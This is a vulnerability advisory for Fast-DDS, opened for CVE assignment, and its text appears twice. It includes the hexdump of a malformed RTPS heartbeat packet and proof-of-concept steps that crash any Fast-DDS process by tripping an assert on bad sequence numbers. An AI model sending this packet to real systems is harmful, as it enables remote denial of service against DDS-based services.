Summary
This was reported as #3236.
Opening an advisory for CVE assignment as per the request of Miguel.
Details
Hexdump of a (semantically) malformed RTPS heartbeat message:
0000 45 00 00 68 00 01 40 00 40 11 D9 76 80 3D F0 CF E..h..@.@..v.=..
0010 EF FF 00 01 05 39 1C E8 00 54 08 B9 52 54 50 53 .....9...T..RTPS
0020 02 04 01 0F 01 03 02 42 AC 11 00 02 45 E5 E2 FD .......B....E...
0030 07 BF 34 00 00 00 10 00 00 00 00 00 00 01 00 C2 ..4.............
0040 00 00 00 00 A7 9B EA 8C BE ED DC CB 00 03 00 00 ................
0050 77 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 w...............
0060 00 00 00 00 00 00 00 00 ........
This heartbeat submessage has bad sequence numbers, i.e.,
firstSN.high = 0xc2000100 // -1040187136
firstSN.low = 0x00
lastSN.high = 0x8cea9ba7
lastSN.low = 0xcbdcedbe
The sanity check line at MessageReceiver.cpp:1057, invokes the -
operator (firstSN - 1
):
inline SequenceNumber_t operator -(
const SequenceNumber_t& seq,
const uint32_t inc) noexcept
{
SequenceNumber_t res(seq.high, seq.low - inc);
if (inc > seq.low)
{
// Being the type of the parameter an 'uint32_t', the decrement of 'high' will be as much as 1.
assert(0 < res.high);
--res.high;
}
return res;
}
in which inc (== 1) > seq.low (== 0)
is false
and the assert() inside is triggered as 0 < res.high (== -1040187136)
is false
.
PoC
Run any fastdds process on domain 0.
Send the RTPS packet above to 127.0.0.1:7400.
Impact
This can remotely crash any Fast-DDS process.
Summary
This was reported as #3236.
Opening an advisory for CVE assignment as per the request of Miguel.
Details
Hexdump of a (semantically) malformed RTPS heartbeat message:
This heartbeat submessage has bad sequence numbers, i.e.,
The sanity check line at MessageReceiver.cpp:1057, invokes the
-
operator (firstSN - 1
):in which
inc (== 1) > seq.low (== 0)
isfalse
and the assert() inside is triggered as0 < res.high (== -1040187136)
isfalse
.PoC
Run any fastdds process on domain 0.
Send the RTPS packet above to 127.0.0.1:7400.
Impact
This can remotely crash any Fast-DDS process.